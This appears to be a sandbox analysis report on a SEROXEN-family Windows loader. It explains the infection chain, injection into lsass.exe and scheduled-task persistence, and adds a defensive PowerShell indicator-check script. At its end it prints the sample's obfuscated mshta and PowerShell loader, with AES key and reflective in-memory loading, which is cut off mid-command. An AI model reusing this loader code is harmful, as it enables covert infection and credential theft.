Set value (int) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | Explorer.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\NodeSlot = "4" | Explorer.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft | svchost.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate\Disallow = 5f090e61d1aada01 | svchost.exe
Runs ping.exe (1 TTPs, 1 IoCs)
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes: Uni.bat.exe, dllhost.exe, dllhost.exe, $sxr-powershell.exe, dllhost.exe, dllhost.exe, $sxr-powershell.exe, dllhost.exe, dllhost.exe
pid | process
2624 | Uni.bat.exe
2624 | Uni.bat.exe
2624 | Uni.bat.exe
2604 | dllhost.exe
2604 | dllhost.exe
2452 | dllhost.exe
2452 | dllhost.exe
2452 | dllhost.exe
2452 | dllhost.exe
2604 | dllhost.exe
2604 | dllhost.exe
2624 | Uni.bat.exe
2624 | Uni.bat.exe
1360 | $sxr-powershell.exe
1360 | $sxr-powershell.exe
1360 | $sxr-powershell.exe
1360 | $sxr-powershell.exe
2156 | dllhost.exe
2156 | dllhost.exe
2156 | dllhost.exe
2156 | dllhost.exe
4868 | dllhost.exe
4868 | dllhost.exe
4868 | dllhost.exe
4868 | dllhost.exe
1360 | $sxr-powershell.exe
1360 | $sxr-powershell.exe
3900 | $sxr-powershell.exe
1360 | $sxr-powershell.exe
3552 | dllhost.exe
3552 | dllhost.exe
3552 | dllhost.exe
3552 | dllhost.exe
3552 | dllhost.exe
3552 | dllhost.exe
3552 | dllhost.exe
3552 | dllhost.exe
3044 | dllhost.exe
3044 | dllhost.exe
3552 | dllhost.exe
3552 | dllhost.exe
3044 | dllhost.exe
3044 | dllhost.exe
3552 | dllhost.exe
3552 | dllhost.exe
3044 | dllhost.exe
3044 | dllhost.exe
3552 | dllhost.exe
3552 | dllhost.exe
3900 | $sxr-powershell.exe
3900 | $sxr-powershell.exe
3552 | dllhost.exe
3552 | dllhost.exe
3044 | dllhost.exe
3044 | dllhost.exe
3552 | dllhost.exe
3552 | dllhost.exe
3900 | $sxr-powershell.exe
3900 | $sxr-powershell.exe
3552 | dllhost.exe
3552 | dllhost.exe
3044 | dllhost.exe
3044 | dllhost.exe
3552 | dllhost.exe
Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
Processes: Explorer.EXE
pid | process
3312 | Explorer.EXE
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes: Uni.bat.exe, dllhost.exe, dllhost.exe, $sxr-powershell.exe, dllhost.exe, dllhost.exe, $sxr-powershell.exe, dllhost.exe, svchost.exe, Explorer.EXE, dllhost.exe, svchost.exe
description | pid | process
Token: SeDebugPrivilege | 2624 | Uni.bat.exe
Token: SeDebugPrivilege | 2624 | Uni.bat.exe
Token: SeDebugPrivilege | 2604 | dllhost.exe
Token: SeDebugPrivilege | 2452 | dllhost.exe
Token: SeDebugPrivilege | 1360 | $sxr-powershell.exe
Token: SeDebugPrivilege | 1360 | $sxr-powershell.exe
Token: SeDebugPrivilege | 4868 | dllhost.exe
Token: SeDebugPrivilege | 2156 | dllhost.exe
Token: SeDebugPrivilege | 3900 | $sxr-powershell.exe
Token: SeDebugPrivilege | 1360 | $sxr-powershell.exe
Token: SeDebugPrivilege | 3552 | dllhost.exe
Token: SeAuditPrivilege | 2356 | svchost.exe
Token: SeShutdownPrivilege | 3312 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3312 | Explorer.EXE
Token: SeShutdownPrivilege | 3312 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3312 | Explorer.EXE
Token: SeShutdownPrivilege | 3312 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3312 | Explorer.EXE
Token: SeShutdownPrivilege | 3312 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3312 | Explorer.EXE
Token: SeAuditPrivilege | 2356 | svchost.exe
Token: SeShutdownPrivilege | 3312 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3312 | Explorer.EXE
Token: SeShutdownPrivilege | 3312 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3312 | Explorer.EXE
Token: SeShutdownPrivilege | 3312 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3312 | Explorer.EXE
Token: SeShutdownPrivilege | 3312 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3312 | Explorer.EXE
Token: SeShutdownPrivilege | 3312 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3312 | Explorer.EXE
Token: SeShutdownPrivilege | 3312 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3312 | Explorer.EXE
Token: SeDebugPrivilege | 3044 | dllhost.exe
Token: SeShutdownPrivilege | 3312 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3312 | Explorer.EXE
Token: SeShutdownPrivilege | 3312 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3312 | Explorer.EXE
Token: SeShutdownPrivilege | 3312 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3312 | Explorer.EXE
Token: SeShutdownPrivilege | 3312 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3312 | Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege | 2480 | svchost.exe
Token: SeIncreaseQuotaPrivilege | 2480 | svchost.exe
Token: SeSecurityPrivilege | 2480 | svchost.exe
Token: SeTakeOwnershipPrivilege | 2480 | svchost.exe
Token: SeLoadDriverPrivilege | 2480 | svchost.exe
Token: SeSystemtimePrivilege | 2480 | svchost.exe
Token: SeBackupPrivilege | 2480 | svchost.exe
Token: SeRestorePrivilege | 2480 | svchost.exe
Token: SeShutdownPrivilege | 2480 | svchost.exe
Token: SeSystemEnvironmentPrivilege | 2480 | svchost.exe
Token: SeUndockPrivilege | 2480 | svchost.exe
Token: SeManageVolumePrivilege | 2480 | svchost.exe
Token: SeAssignPrimaryTokenPrivilege | 2480 | svchost.exe
Token: SeIncreaseQuotaPrivilege | 2480 | svchost.exe
Token: SeSecurityPrivilege | 2480 | svchost.exe
Token: SeTakeOwnershipPrivilege | 2480 | svchost.exe
Token: SeLoadDriverPrivilege | 2480 | svchost.exe
Token: SeSystemtimePrivilege | 2480 | svchost.exe
Token: SeBackupPrivilege | 2480 | svchost.exe
Token: SeRestorePrivilege | 2480 | svchost.exe
Token: SeShutdownPrivilege | 2480 | svchost.exe
Token: SeSystemEnvironmentPrivilege | 2480 | svchost.exe
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
pid   process
3312  Explorer.EXE   (4 events)
-
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
pid   process
3312  Explorer.EXE   (3 events)
-
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
pid   process
1360  $sxr-powershell.exe
3312  Explorer.EXE   (4 events)
4900  Conhost.exe
Explorer.EXE and Conhost.exe install hooks as part of normal shell and console operation; the hook set by $sxr-powershell.exe 1360, the second-stage loader that goes on to spawn the dllhost.exe surrogates, is the one worth examining, since a message hook from a loader process is the usual entry point for keystroke capture.
-
Suspicious use of WriteProcessMemory 64 IoCs
Identical consecutive rows are collapsed with a count. The two-event parent-to-child rows are the ordinary writes that accompany process creation; the seven- and nine-event rows are the loaders filling the dllhost.exe surrogates they have just started. The last group is the one to act on: dllhost.exe 3552, itself spawned by $sxr-powershell.exe 1360, writes into winlogon.exe, lsass.exe, dwm.exe and nine svchost.exe service hosts, so the injected code has moved out of the dropped binaries and into long-lived system processes, lsass.exe included.
Processes:
description                       pid   process               target process
PID 2932 wrote to memory of 2624  2932  cmd.exe               Uni.bat.exe           (2 events)
PID 2624 wrote to memory of 2604  2624  Uni.bat.exe           dllhost.exe           (7 events)
PID 2624 wrote to memory of 2452  2624  Uni.bat.exe           dllhost.exe           (9 events)
PID 2244 wrote to memory of 4660  2244  $sxr-mshta.exe        $sxr-cmd.exe          (2 events)
PID 4660 wrote to memory of 1360  4660  $sxr-cmd.exe          $sxr-powershell.exe   (2 events)
PID 1360 wrote to memory of 4868  1360  $sxr-powershell.exe   dllhost.exe           (7 events)
PID 1360 wrote to memory of 3112  1360  $sxr-powershell.exe   dllhost.exe           (3 events)
PID 1360 wrote to memory of 2156  1360  $sxr-powershell.exe   dllhost.exe           (9 events)
PID 1360 wrote to memory of 3900  1360  $sxr-powershell.exe   $sxr-powershell.exe   (2 events)
PID 1360 wrote to memory of 3552  1360  $sxr-powershell.exe   dllhost.exe           (9 events)
PID 3552 wrote to memory of 632   3552  dllhost.exe           winlogon.exe
PID 3552 wrote to memory of 688   3552  dllhost.exe           lsass.exe
PID 3552 wrote to memory of 996   3552  dllhost.exe           svchost.exe
PID 3552 wrote to memory of 460   3552  dllhost.exe           dwm.exe
PID 3552 wrote to memory of 720   3552  dllhost.exe           svchost.exe
PID 3552 wrote to memory of 1036  3552  dllhost.exe           svchost.exe
PID 3552 wrote to memory of 1044  3552  dllhost.exe           svchost.exe
PID 3552 wrote to memory of 1100  3552  dllhost.exe           svchost.exe
PID 3552 wrote to memory of 1160  3552  dllhost.exe           svchost.exe
PID 3552 wrote to memory of 1180  3552  dllhost.exe           svchost.exe
PID 3552 wrote to memory of 1212  3552  dllhost.exe           svchost.exe
PID 3552 wrote to memory of 1324  3552  dllhost.exe           svchost.exe
-
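The table above, together with the $sxr- entries in the process tree further down, yields three cheap host checks: a dllhost.exe /Processid:{...} surrogate whose parent is not the DcomLaunch svchost.exe, a running image or a file named C:\Windows\$sxr-*, and a PowerShell host running under some other name with the loader's -ep bypass -command switches. The script below is an added example written for this page, not code from the sandbox or from the sample; the only things it assumes beyond what the report shows are the C:\Windows\$sxr-* file pattern as a search key and the Explorer\Advanced value names HideFileExt and ShowSuperHidden that sit behind the two Explorer visibility signatures listed on this page.

```powershell
# Added example (not the sandbox's or the sample's code): host-side triage checks derived from
# this report. Run elevated so Win32_Process returns every process's command line.
function Find-SxrIndicators {
    $hits  = New-Object System.Collections.Generic.List[object]
    $procs = Get-CimInstance -ClassName Win32_Process
    $byPid = @{}
    foreach ($p in $procs) { $byPid[[int]$p.ProcessId] = $p }

    foreach ($p in $procs) {
        $parent     = $byPid[[int]$p.ParentProcessId]
        $parentName = if ($parent) { $parent.Name } else { '<exited>' }   # '<exited>' needs manual review
        $cmd        = [string]$p.CommandLine

        # 1. COM surrogate with the wrong parent. A genuine "dllhost.exe /Processid:{...}" is started
        #    by the DcomLaunch svchost.exe; in the report they hang off Uni.bat.exe, $sxr-powershell.exe
        #    and, through a spoofed parent, winlogon.exe.
        if ($p.Name -ieq 'dllhost.exe' -and $cmd -match '/Processid:\{' -and $parentName -ine 'svchost.exe') {
            $hits.Add([pscustomobject]@{ Rule = 'dllhost-unexpected-parent'; Pid = $p.ProcessId; Parent = $parentName; Detail = $cmd })
        }
        # 2. Renamed LOLBins: the mshta/cmd/powershell copies dropped as C:\Windows\$sxr-*.exe.
        if ($p.ExecutablePath -like 'C:\Windows\$sxr-*') {
            $hits.Add([pscustomobject]@{ Rule = 'sxr-renamed-binary'; Pid = $p.ProcessId; Parent = $parentName; Detail = $p.ExecutablePath })
        }
        # 3. A PowerShell host running under another name (Uni.bat.exe in the report) with the loader's switches.
        if ($p.Name -inotmatch '^(powershell|pwsh)\.exe$' -and $cmd -match '-(ep|executionpolicy)\s+bypass\b.*-command') {
            $hits.Add([pscustomobject]@{ Rule = 'renamed-powershell-host'; Pid = $p.ProcessId; Parent = $parentName; Detail = $cmd })
        }
    }

    # 4. Dropped files on disk, whether or not a process is still running.
    Get-ChildItem -Path 'C:\Windows' -Filter '$sxr-*' -Force -ErrorAction SilentlyContinue | ForEach-Object {
        $hits.Add([pscustomobject]@{ Rule = 'sxr-dropped-file'; Pid = $null; Parent = $null; Detail = $_.FullName })
    }

    # 5. Explorer view settings the sample touches ("Modifies visibility of file extensions / hidden-system
    #    files"): report the current values so they can be compared with the organisation's baseline.
    $adv = Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced' -ErrorAction SilentlyContinue
    foreach ($name in 'HideFileExt', 'ShowSuperHidden') {
        if ($null -ne $adv -and $null -ne $adv.$name) {
            $hits.Add([pscustomobject]@{ Rule = 'explorer-view-setting'; Pid = $null; Parent = $null; Detail = "$name = $($adv.$name)" })
        }
    }
    return $hits
}

Find-SxrIndicators | Format-Table -AutoSize -Wrap
```

Rule 1 is the strongest of the five: dllhost.exe surrogates are always activated through the DcomLaunch service, so any other parent (or an exited one) is worth pulling the process memory for, and on the reported image it would have flagged every surrogate the loaders created, including the ones re-parented under winlogon.exe. Rules 2 and 4 are specific to this family's $sxr- naming; rule 3 generalises to any script-named copy of powershell.exe.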
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
How to read the tree: each entry is the image path immediately followed by the command line, and the digit before the arrow is the nesting depth (1 = top level, 2 = child of the nearest depth-1 entry above it, and so on). The Conhost.exe 0xffffffff -ForceV1 entries are the console hosts every cmd.exe or PowerShell child gets and carry no meaning of their own.
The infection chain runs Explorer.EXE > cmd.exe /c Uni.bat > Uni.bat.exe, where Uni.bat.exe is a copy of the PowerShell host renamed after the script (its command line is PowerShell: -noprofile -windowstyle hidden -ep bypass -command ...). That loader reads the line of Uni.bat that begins with SEROXEN, drops the tag, splits the remainder on '\', Base64-decodes both halves, AES-CBC-decrypts them with a key and IV carried in the command line, gunzips them and loads the two resulting .NET assemblies in memory through [Reflection.Assembly]::Load; the member names are hidden by writing them backwards and reversing them at run time ('gnirtS46esaBmorF' is FromBase64String). It then starts SysWOW64\dllhost.exe surrogates, is flagged for SetThreadContext and WriteProcessMemory against them (the pattern of process hollowing), and finally removes itself with the cmd.exe chain PING localhost -n 8, taskkill, ATTRIB -h -s, del.
The $sxr- branch is the persistence. C:\Windows\$sxr-mshta.exe (a renamed mshta) is started by the Schedule service host, i.e. from a scheduled task, which is what the Task Scheduler COM API signature above records. It runs a javascript: URI that writes a VBScript page to start $sxr-cmd.exe, which uses cmd's %VAR:old=new% substitution to rebuild the $sxr-powershell.exe command line from an environment variable. That second-stage loader decrypts a small string table with a second key and IV, exits if a process with one of the decrypted names is already running (a single-instance check), reads the payload from a registry value named by three more of those strings, and decrypts, gunzips and loads it exactly as stage 1 did. A second $sxr-powershell.exe waits for PID 1360 to exit, sleeps five seconds and runs the same loader again, so killing the first copy on its own does not help.
The dllhost.exe entries shown at depth 2 under winlogon.exe were not started by winlogon: the NtCreateUserProcessOtherParentProcess signature on Uni.bat.exe and $sxr-powershell.exe shows they were created with a spoofed parent, and the WerFault.exe entries beneath them are crashes of those surrogates.
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1ef4e76f-b587-4b55-8c97-a2c501568a72}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b248a598-76f8-4679-b0c0-ebcfaf65a8ba}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c6e84c9a-b4b7-4c6b-8f52-e96d28091046}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{35c6c327-8b8b-41fd-95a7-e1585bc8e8b9}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2cb9cbce-6196-4d8c-aa8e-b1bf5562dba0}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{fa61374d-0cf9-4f46-9a28-a8fffc47feeb}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b50dd45c-b3cb-4658-ad0a-30d87db9b509}2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4844 -s 3243⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{95890ecf-54f4-4413-bec7-bbadde83b176}2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5320 -s 3123⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ffd005f7-d39f-4c1f-9223-24e8a618dfd5}2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function hufeg($iDMxb){ $Elzpw=[System.Security.Cryptography.Aes]::Create(); $Elzpw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Elzpw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Elzpw.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk='); $Elzpw.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA=='); $wCTZr=$Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')(); $YgtPo=$wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iDMxb, 0, $iDMxb.Length); $wCTZr.Dispose(); $Elzpw.Dispose(); $YgtPo;}function FJcTY($iDMxb){ $KHdof=New-Object System.IO.MemoryStream(,$iDMxb); $mdDGq=New-Object System.IO.MemoryStream; $PZsap=New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::Decompress); $PZsap.CopyTo($mdDGq); $PZsap.Dispose(); $KHdof.Dispose(); $mdDGq.Dispose(); $mdDGq.ToArray();}function vUmWc($iDMxb,$PbTpW){ $YHPse=[System.Reflection.Assembly]::Load([byte[]]$iDMxb); $aMqIy=$YHPse.EntryPoint; $aMqIy.Invoke($null, $PbTpW);}$Elzpw1 = New-Object System.Security.Cryptography.AesManaged;$Elzpw1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$lkChZ = $Elzpw1.('rotpyrceDetaerC'[-1..-15] -join '')();$kveij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('skxuT638mXYXO82tnMu4Nw==');$kveij = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij, 0, $kveij.Length);$kveij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij);$uYwHJ = 
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7tPhtRoBPpmbD4jKqCrROmZ5ihpYMWVokvpj2Ng/Pz8=');$uYwHJ = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uYwHJ, 0, $uYwHJ.Length);$uYwHJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uYwHJ);$XPhKE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MN4dM3v9612JtLqaveCMYg==');$XPhKE = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XPhKE, 0, $XPhKE.Length);$XPhKE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XPhKE);$muibj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('omE0gz6POPNwhNmUAnPGH44LhwPPACLWik/KT0dk5wsKXAxtKag+L5FPGR5kaqhlGUck2HtfdRNBwrYMOEAetiGgAox0exmtDDnAYLadphZBvi4OP8B8BNL4k5y/z1AEr7oudmgyCQifH3aXxa/gUUa4xjDsSD2YTOub7PHlsdmqG91RSBUMJH4vfT2zptSsj0OSscQsY4xVPZ8OjeRKbzP+BjF+Uue1s9LcXQdrizsUEKJN4dY28g0skU19VzfudgJv7Qa+SS93YCgWa9n+oNhygZquca/xgmF4Z+su7WedF+8tBgUKzviRtdEdVgLq/OMSlirCLjvFnSHC2y9K1oTEEyD1mQB836kwPebOOTmBNH6vdn2bEQQYiF/vc3FItt5vYPuWyJGzUen95KOQjYu7YoPz/dFXDUgmI65vnuw=');$muibj = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($muibj, 0, $muibj.Length);$muibj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($muibj);$DHHcr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tYnkG6mWBgWnZf6oIR3L5A==');$DHHcr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DHHcr, 0, $DHHcr.Length);$DHHcr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DHHcr);$EQNXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fF2zWzAZ0BefyD1XaGcLw==');$EQNXr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EQNXr, 0, $EQNXr.Length);$EQNXr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EQNXr);$mYQZS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3I7S8iNpJjrn0k9Lgckneg==');$mYQZS = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mYQZS, 0, $mYQZS.Length);$mYQZS = 
[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mYQZS);$DbkFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8BsdeVWD9I78LbbRhRFrA==');$DbkFT = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkFT, 0, $DbkFT.Length);$DbkFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DbkFT);$jgfOd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEFFbXtp5W2U1hAoq0CpPw==');$jgfOd = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jgfOd, 0, $jgfOd.Length);$jgfOd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jgfOd);$kveij0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+Vym/OwDnC1v1RFNGQ5MA==');$kveij0 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij0, 0, $kveij0.Length);$kveij0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij0);$kveij1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1UB7UYof3ztQu3+ei666DQ==');$kveij1 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij1, 0, $kveij1.Length);$kveij1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij1);$kveij2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9594UuKb/Z+/WVWczIhxbQ==');$kveij2 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij2, 0, $kveij2.Length);$kveij2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij2);$kveij3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxkDZyakK1CM3mmPkfi6OQ==');$kveij3 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij3, 0, $kveij3.Length);$kveij3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij3);$lkChZ.Dispose();$Elzpw1.Dispose();if (@(get-process -ea silentlycontinue $kveij3).count -gt 1) {exit};$ebqGe = 
[Microsoft.Win32.Registry]::$DbkFT.$mYQZS($kveij).$EQNXr($uYwHJ);$SceND=[string[]]$ebqGe.Split('\');$sNXpr=FJcTY(hufeg([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[1])));vUmWc $sNXpr (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$GiWwX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[0]);$Elzpw = New-Object System.Security.Cryptography.AesManaged;$Elzpw.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$wCTZr = $Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')();$GiWwX = $wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GiWwX, 0, $GiWwX.Length);$wCTZr.Dispose();$Elzpw.Dispose();$KHdof = New-Object System.IO.MemoryStream(, $GiWwX);$mdDGq = New-Object System.IO.MemoryStream;$PZsap = New-Object 